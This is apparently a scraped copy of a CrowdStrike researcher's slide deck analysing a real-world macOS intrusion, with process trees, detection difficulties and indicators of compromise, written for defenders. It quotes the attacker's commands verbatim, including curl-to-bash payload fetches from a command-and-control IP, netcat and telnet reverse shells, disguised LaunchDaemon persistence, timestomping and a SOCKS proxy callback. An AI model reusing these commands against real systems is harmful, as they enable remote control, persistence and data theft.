Scribd
Upload
50 views35 pages

Macdoored: A First Look Into Real-World Macos Intrusions

This document provides an overview of real-world macOS intrusions from the perspective of a CrowdStrike security researcher. It describes how macOS intrusions can be difficult to detect due to similarities between admin and attacker activity. It then outlines the steps an attacker took in one intrusion which included installing a backdoor, using it for reconnaissance, making the backdoor persistent, and attempting lateral movement. It concludes by providing indicators associated with the intrusion and discussing challenges in macOS detection and analysis.

Uploaded by

Bdiaf Mohammed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
50 views35 pages

Macdoored: A First Look Into Real-World Macos Intrusions

This document provides an overview of real-world macOS intrusions from the perspective of a CrowdStrike security researcher. It describes how macOS intrusions can be difficult to detect due to similarities between admin and attacker activity. It then outlines the steps an attacker took in one intrusion which included installing a backdoor, using it for reconnaissance, making the backdoor persistent, and attempting lateral movement. It concludes by providing indicators associated with the intrusion and discussing challenges in macOS detection and analysis.

Uploaded by

Bdiaf Mohammed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 35

MACDOORED

A FIRST LOOK INTO REAL-WORLD MACOS INTRUSIONS

2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


JARON BRADLEY
SENIOR SECURITY RESEARCH
DEVELOPER CROWDSTRIKE

JARON BRADLEY started his career out of college as an incident responder. He


originally joined CrowdStrike on what is now known as the OverWatch team
sifting through customer data and looking for malicious activity. He then moved to
the Engine Content and Detections team where he focused on writing detections
for the macOS sensor. He now works on the Strategic Counter-Adversarial
Research team developing and enabling new ways to catch malicious actors
within customer networks. Jaron is the Author of OS X Incident Response
Scripting and Analysis.
Macdoored Agenda

1 Mac Hunting Overview

2 Detections in the Wild

3 Detection and Analysis Difficulties

4 Attacker Intrusions

5 Wrap- up

Macdoored by Jaron Bradley


THE IMPORTANCE OF THE PROCESS TREE

Sudoers File
launchd jamf bash vim
Modified

Sudoers File
launchd /var/tmp/a bash vim
Modified
DETECTION/ANALYSIS DIFFICULTIES
§ All the commands an attacker could ever need are on the system

§ Admin and Attacker activity can look like the same thing

§ Backdoors can be written in many different languages

§ Malware sample size incredibly small compared to Windows


THE INTRUSION

Attacker
Activity
Attacker
launchd sshd bash
Activity

Attacker
Activity

2018 CROWDSTRIKE, INC. ALL RIGHTS RESERVED.


RECON

sw_vers
system_profiler
dscl . -list /Users
launchd sshd bash ping –c1 <system>
dig <host>
dns-sd –B <service>
BACKDOOR
BACKDOOR INSTALLATION

curl -O hxxp://61.78.62.21:8080/Tssd

chmod +x Tssd

mv /var/tmp/Tssd rutil
launchd sshd bash touch -r r2util rutil

ls -la /usr/local/bin/rutil

vim /etc/.cache

chmod 400 .cache


BACKDOOR VARIANTS

System 1
launchd sshd bash curl -O hxxp://61.78.62.21:8080/Tssd

System 2

launchd sshd bash curl -O hxxp://61.78.62.21:8080/Tss

System 3

launchd sshd bash curl -sO hxxp://61.78.62.21:8080/grrs


61.78.62.21

WICKED PANDA
CURL ALL THE THINGS
curl -O hxxp://61.78.62.21:8080/1.txt -o /var/tmp/1.txt

curl hxxp://61.78.62.21:8080/5.txt | bash

curl hxxp://61.78.62.21:8080/5.txt%20|%20bash

curl hxxp://61.78.62.21:8080/5.txt%20|%20bash

launchd rutil bash curl hxxp://61.78.62.21:8080/5.txt\x7cbash

curl hxxp://61.78.62.21:8080/5.txt%7cbash

curl hxxp://61.78.62.21:8080/5.txt || bash

curl hxxp://61.78.62.21:8080/x
QUICK HUNTING NOTE
curl
PID = 2
PGID = 2

curl malz.txt | dd xyz | bash dd


PID = 1 PID = 3
PGID = x PGID = 2

bash
PID = 4
PGID = 2
WHOOPS…

nc 61.78.62.21 53 -e /bin/sh

nc -e /bin/sh 61.78.62.21 53
nc --e /bin/sh 61.78.62.21 53

launchd sshd bash nc --exec /bin/sh 61.78.62.21 53


/bin/sh | nc 61.78.62.21 53

mknod /tmp/p p && telnet 61.78.62.21 53 0/tmp/p


PERSISTENCE
TYPICAL PERSISTENCE
System Integrity Protection Level
/System/Library/LaunchDaemons
/System/Library/LaunchAgents

Root Level
/Library/LaunchDaemons
/Library/LaunchAgents

User Level
/Users/$USER/Library/LaunchDaemons
/Users/$USER/Library/LaunchAgents
PERSISTENCE

vim
/Library/LaunchDaemons/com.apple.xsprinter.plist

launchd sshd bash


launchctl load –w
/Library/LaunchDaemons/com.apple.xsprinter.plist
MORE THAN JUST A SYSTEM CHECK

touch /usr/bin/x
rm –rf /usr/bin/x
uname -an
launchd sshd bash system_profiler SPHardwareDataYpe

system_profiler SPHardwareDataType

/usr/sbin/system_profiler -nospawn -
xml SPHardwareDataType -detailLevel
full
YOSEMITE PERSISTENCE

/System/Library/LaunchDaemons/com.apple.xsprinter.plist

touch -r ssh.plist com.apple.xsprinter.plist

launchd sshd bash

launchctl load -w
/System/Library/LaunchDaemons/com.apple.xsprinter.plist
PERSISTENCE PIGGYBACKING
CLEANUP
MINOR STEALTH

61.78.62.21
rm /tmp/x

touch –r r2util rutil


touch –r profile .cache
touch –r
com.cisco.anyconnect.aciseagentd.p
launchd rutil bash list com.apple.xsprinter.plist

ssh user@ip -o UserKnownHostsFile=/dev/null


LATERAL MOVEMENT
LATERAL MOVEMENT
grep ssh .bash_history
61.78.62.21
cat known_hosts

curl -sO hxxp://61.78.62.21:8080/rs

ssh -TNfq -Frs


launchd rutil bash
ssh -o UserKnownHostsFile=/dev/null <ip>

ssh user@ip -o UserKnownHostsFile=/dev/null

launchd sshd bash sw_vers


SUDO
PTY|TTY
§ python -c import
base64;exec(base64.b64decode('aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vY
mFzaCcp'));
STATIC INDICATORS
§ https://github.com/jbradley89/shakacon-yara

§ Backdoor
§ 8029e7b12742d67fe13fcd53953e6b03ca4fa09b1d5755f8f8289eac08366efc
§ a5f7b13d0f259277e40e3711070121e451415d7d3a5e68382fc82c2fe3635db1
§ 5b0cc5dd2897e697751b8204d8b74edd66466d651d233c76899c5521a60f6527

§ IPs
§ 61.78.62[.]21 (C2)

§ Backdoor File Names


§ /usr/local/bin/google-updater
§ /usr/local/bin/prl-monitor
§ /usr/local/bin/git-lf
§ /usr/local/sbin/nortonscanner
§ /usr/local/plutil

§ LaunchDaemon File Names


§ /Library/LaunchDaemons/com.apple.xsprinter.plist
§ /System/Library/LaunchDaemons/com.apple.xsprinter.plist
curl -o /usr/local/bin/softwareupdated
45.77.129.251:11/asd

WICKED PANDAS?
chmod +x
softwareupdated

./softwareupdated
launchd sshd bash
curl -o asd
45.77.129.251:11/asd

mv asd /Library/LaunchDaemons/local.localhost.startup.plist

ssh -oUserKnownHostsFile=/dev/null -oStrictHostKeyChecking=no ….


PASTEBIN
curl
https://pastebin.com/r
aw/HEmKr39h
launchd softwareupdated bash

perl
EXFIL curl -o update
45.77.129.251:11/asd

chmod +x update

launchd softwareupdated bash


<commands staging exfil>

nohup ./update -s rssocks -d


45.77.129.251 -e 44257
§ Twitter: @jbradley89

§ Questions?

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy